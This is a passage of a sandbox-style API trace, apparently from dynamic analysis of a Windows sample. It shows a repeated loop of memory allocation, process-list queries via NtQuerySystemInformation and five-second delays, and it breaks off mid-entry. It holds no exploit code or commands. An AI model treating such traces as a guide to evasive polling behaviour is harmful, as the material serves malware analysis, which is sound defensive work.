[0127.627] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.627] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.629] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.631] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.632] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.639] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.640] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.640] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.641] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.641] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.643] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.644] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.655] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.656] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.656] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.656] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.657] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.659] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.659] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.671] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.671] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.672] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.672] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.672] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.674] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.675] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.699] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.700] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.700] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.700] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.703] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.704] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.717] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.718] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.719] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.719] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.721] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.722] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.739] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.739] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.740] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.740] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.740] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.742] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.743] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.749] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.749] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.749] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.749] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.750] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.751] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.752] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.764] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.765] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.765] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.765] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.765] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.768] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.768] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.780] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.781] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.781] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.781] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.783] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.784] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.795] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.796] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.796] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.796] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.797] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.798] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.799] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.811] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.811] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.812] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.812] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.812] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.814] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.815] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.827] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.827] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.828] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.828] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.828] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.831] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.831] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.844] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.844] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.845] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.845] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.845] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.847] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.848] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.858] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.858] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.859] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.859] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.859] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.861] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.862] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.873] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.874] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.874] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.875] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.877] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.877] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.889] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.889] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.890] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.890] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.890] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.892] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.893] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.922] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.922] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.923] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.923] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.923] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.925] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.926] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.936] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.936] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.937] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.937] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.937] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.940] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.940] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.953] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.953] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.953] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.954] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.954] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.956] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.957] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.967] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.967] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.968] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.968] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.969] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.971] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.972] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0127.983] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0127.983] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0127.983] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0127.984] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: 